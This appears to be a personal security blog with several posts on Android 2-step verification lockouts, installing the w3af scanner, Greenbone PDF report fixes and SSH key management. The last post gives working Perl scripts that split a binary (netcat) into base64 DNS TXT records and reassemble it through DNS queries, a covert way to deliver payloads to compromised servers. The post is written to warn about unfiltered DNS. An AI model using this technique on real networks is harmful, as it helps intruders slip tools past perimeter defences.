Saturday, 14 January 2012

Google 2-factor authentication and Android devices

A quick search showed that there are a lot of folks out there who have inadvertently locked their Android phones and been unable to log in with their Google credentials. This happened to me this morning, and the advice generally seems to fall into two camps:
  • Exploit a bug in the phone UI to allow access to menus during a phone call
  • Factory reset the device
There's another option which may help a growing number of users. If you have Google's 2-factor authentication switched on, then username/password recovery of a locked device won't work. Switching off 2-step verification temporarily will allow you to unlock your phone. Just don't forget to enable it again afterwards.

The real gripe in all of this is how poorly supported 2-step verification is, particularly among third-party software (and hardware) vendors. Plenty of things still break if you have 2-factor auth switched on and an application expects to log in with traditional credentials. Is that because it's too hard to integrate, because adoption is still too low, or for some other reason?

Thursday, 7 July 2011

Installing w3af on Amazon Linux AMI

Having a host out on the Internet from which to scan your network is useful, and cloud providers let us spin up virtual servers to scratch this itch. I've been using Amazon EC2 for this, and one challenge can be installing tools, particularly if you opt for one of the pre-built OS images on offer.

I've been installing w3af on just such a VM.
$ cat /etc/system-release
Amazon Linux AMI release 2011.02.1.1 (beta)

Install RPM packages
There are several RPM packages that satisfy the dependencies for w3af, but you are going to be left with a fair few that require manual installation. Start by installing what you can from the yum repository.
$ sudo yum install python26 python26-devel python26-tools pyOpenSSL SOAPpy \
PyYAML libxml2-devel libxslt-devel gcc make subversion-devel gcc-c++ \
libcom_err-devel openssl-devel

Install pybloomfilter
$ wget http://pypi.python.org/packages/source/p/pybloomfiltermmap/pybloomfiltermmap-0.2.0.tar.gz#md5=7e77edec5b442bc29bb4ec5f09cb2ad5
$ tar xzvf pybloomfiltermmap-0.2.0.tar.gz
$ cd pybloomfiltermmap-0.2.0
$ sudo python setup.py install

Install nltk
$ wget http://nltk.googlecode.com/files/nltk-2.0.1rc1.tar.gz
$ tar xzvf nltk-2.0.1rc1.tar.gz
$ cd nltk-2.0.1rc1
$ sudo python setup.py install

Install lxml
$ wget http://pypi.python.org/packages/source/l/lxml/lxml-2.3.tar.gz#md5=a245a015fd59b63e220005f263e1682a
$ tar xzvf lxml-2.3.tar.gz
$ cd lxml-2.3
$ sudo python setup.py install

Install pysvn
$ wget http://pysvn.barrys-emacs.org/source_kits/pysvn-1.7.5.tar.gz
$ tar xzvf pysvn-1.7.5.tar.gz
$ cd pysvn-1.7.5
$ sudo python setup.py install

Install scapy
$ wget http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
$ tar xzvf scapy-latest.tar.gz
$ cd scapy-2.1.0
$ sudo python setup.py install
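
Before moving on to w3af itself, it's worth a quick sanity check that the modules import cleanly. A minimal sketch, assuming python here is the 2.6 interpreter installed earlier (scapy's importable module is scapy.all):
$ python -c "import pybloomfilter, nltk, lxml, pysvn, scapy.all; print 'OK'"
OK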

Install w3af
All being well, you should now have all of the dependencies installed. Check out the latest code from svn and away you go.

$ svn co https://w3af.svn.sourceforge.net/svnroot/w3af/trunk w3af
$ cd w3af
$ ./w3af_console
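From memory, a first console session looks something like this; the plugin names and target URL are purely illustrative, and the exact commands may differ between w3af versions:
w3af>>> plugins
w3af/plugins>>> audit sqli xss
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.example.com/
w3af/config:target>>> back
w3af>>> start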

Wednesday, 15 June 2011

PDF reports in Greenbone Security Assistant

I've seen a few forum posts about PDF report generation failing in Greenbone Security Assistant, particularly when it has been installed from pre-compiled packages. If you check the /tmp directory you will find the remains of the working directory used to create the report, including a useful log file.
! LaTeX Error: File `utf8x.def' not found.
There's a quick workaround for this missing dependency, since no CentOS package actually contains utf8x.def.
[root@server ~]# cd /usr/share/texmf/tex/latex/base/
[root@server base]# ln -s utf8.def utf8x.def
[root@server base]# texhash
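To confirm that TeX can now resolve the file, ask kpsewhich:
[root@server base]# kpsewhich utf8x.def
/usr/share/texmf/tex/latex/base/utf8x.def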
PDF reporting should now work.

Monday, 26 July 2010

Centralised Management of OpenSSH keys

I love OpenSSH. It's a wonderfully versatile way of securing logins and data in transit between systems. One bugbear of mine is how difficult it becomes to manage authentication keys. I've posted about this in the long distant past (the Internet has a long memory) and the subject just won't die, at least not in my mind. So why does this still bug me?

In truth, little has changed over the years in the way SSH keys are handled. Keys are managed in userland, with each user being able to add keys that are trusted for authentication to their account. This is all well and good until the web of trust between host accounts, keys and key owners becomes unmanageable. Who owns or possesses each of the keys in the authorized_keys files, for every user on every host? Are the private keys well protected?

One solution might be to centralise SSH key management and move it to a more strictly controlled environment. I imagine it working something like traditional Unix account management: a file where, unlike the Unix shadow file, more than one authentication token can be linked to an account. The file would be owned by root, and special tools (like passwd) would let less privileged users update and maintain the list of keys linked to their own account. This would allow SSH keys to be managed and audited from a single location.
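
OpenSSH can already be pushed part of the way there. A minimal sketch using the stock AuthorizedKeysFile directive to move the key store out of userland (the path is illustrative):
# /etc/ssh/sshd_config
# Look up each user's keys in a central, root-owned directory
# rather than in ~/.ssh/authorized_keys
AuthorizedKeysFile /etc/ssh/authorized_keys/%u
With that directory owned and writable only by root, users can no longer add keys themselves; what's still missing is the passwd-style tool that mediates updates.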

There are other benefits to be gained from this type of key management. Rules could be added to enforce the storage of additional metadata along with the key, such as who owns it and an expiry date to limit the key's lifetime. Maybe I should dust off my C textbooks and take a look at the OpenSSH source...
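
To illustrate, a record in such a file might look something like this (the format is entirely hypothetical):
alice:ssh-rsa AAAAB3NzaC1yc2EA...:owner=alice@example.org:expires=2010-12-31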

Tuesday, 8 June 2010

Deliver your malware by DNS

HTTP is probably the most common way of distributing malware and of downloading tools onto compromised systems. Too many people still allow unfettered access from their server farms to port 80, but perhaps things are getting better. In the hope that one day servers won't be able to wget the latest rootkit once they're owned, what other ways are there to deliver a payload?

The domain name system allows for TXT records that can contain a text string. Originally intended to hold human-readable information about a host, the TXT record can be, and has been, used to store other information such as SPF and DKIM records. Since we can feed arbitrary text into a TXT record, we could use it to store binary data encoded as text, using base64 or uuencode for example. I thought I would give this a go and wrote a little Perl script to encode a file into DNS entries.
#!/usr/bin/perl
use MIME::Base64;
use Digest::MD5 qw(md5_hex);

# Content source and record naming
$file = "nc.exe";           # file to encode
$name = "nc";               # name of the metadata record
$prefix = "part";           # prefix for the data records
$domain = ".example.net.";  # zone the records will live in

# Slurp the file; binmode matters as the payload is binary
open(IN, '<', $file) or die "Cannot open $file: $!\n";
binmode IN;
while (<IN>) {
    $string .= $_;
}
close IN;

# Checksum the original so the receiver can verify the payload
$md5 = md5_hex($string);
@parts = split("\n", encode_base64($string));
$numparts = $#parts + 1;

# The first record carries the metadata; one record per base64 line follows
$output = "${name}${domain} IN TXT \"md5=$md5; prefix=${prefix}; parts=$numparts;\"\n";
for ($i = 0; $i <= $#parts; $i++) {
    $output .= "${prefix}${i}${domain} IN TXT \"$parts[$i]\"\n";
}
print $output;
What you get out of this script is a list of BIND zone file style DNS records. I encoded the old favourite netcat, and the first few lines of output are shown below.
nc IN TXT "md5=28dd8edad7008289957031606f210675; prefix=part; parts=459;"
part0 IN TXT "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
part1 IN TXT "AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
part2 IN TXT "ZGUuDQ0KJAAAAAAAAABQRQAATAEFAKlLOT8AAAAAAAAAAOAADwILAQI4AFQAAABiAAAAAgAAABAA"
part3 IN TXT "AAAQAAAAcAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAACwAAAABAAAVLEAAAMAAAAAACAA"
The first record contains the metadata relating to the encoded file: the MD5 checksum of the original file, a prefix for the TXT records containing the data, and the number of records the payload is split across. To reassemble the file, append a number starting from zero to the prefix, request that record, increment and repeat.
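
With the zone loaded into a name server for example.net, each piece is a single dig query away (output truncated here):
$ dig +short TXT nc.example.net
"md5=28dd8edad7008289957031606f210675; prefix=part; parts=459;"
$ dig +short TXT part0.example.net
"TVqQAAMAAAAEAAAA..."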

This script recovers the encoded file using DNS queries.
#!/usr/bin/perl
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Net::DNS;

$file = "nc";
$domain = "example.net";

$res = Net::DNS::Resolver->new( nameservers => [qw(127.0.0.1)] );
my $answer = $res->query("$file.$domain", 'TXT');
@txt = $answer->answer;
($initial) = $txt[0]->char_str_list();

# extract content checksum, prefix and number of parts
$initial =~ /md5=(.*?);.*prefix=(.*?);.*parts=(.*?);/;
$md5    = $1;
$prefix = $2;
$parts  = $3;

for ($i = 0; $i < $parts; $i++) {
    my $frag = $prefix . $i . "." . $domain;
    my $answer = $res->query($frag, 'TXT');
    my @frags = $answer->answer;
    my ($string) = $frags[0]->char_str_list();
    $payload .= $string;
}

$binary = decode_base64($payload);
if (md5_hex($binary) eq $md5) {
    print STDERR "md5sum matches\n";
} else {
    print STDERR "md5sum mismatch!\n";
}

open(OUT, '>', 'testfile') or die "Cannot write testfile: $!\n";
binmode OUT;
print OUT $binary;
close OUT;
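Assuming the records above are served by the name server at 127.0.0.1, a run looks like this (the script name is illustrative):
$ perl dns_decode.pl
md5sum matches
$ md5sum nc.exe testfile
28dd8edad7008289957031606f210675  nc.exe
28dd8edad7008289957031606f210675  testfile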
It looks like a lot more work than dropping a file on an FTP server, and to tell the truth it is, so why bother? I can think of a few reasons. Who bothers to filter DNS requests? Who bothers to check DNS responses for malicious payloads? What IDS is going to detect an encoded file split over hundreds or thousands of DNS requests?

If we start making it harder to deliver malware by HTTP, the bad guys will up their game. It's easy to see that they won't need to do much to defeat the perimeter controls of most organisations by abusing a service that is core to the way the Internet works.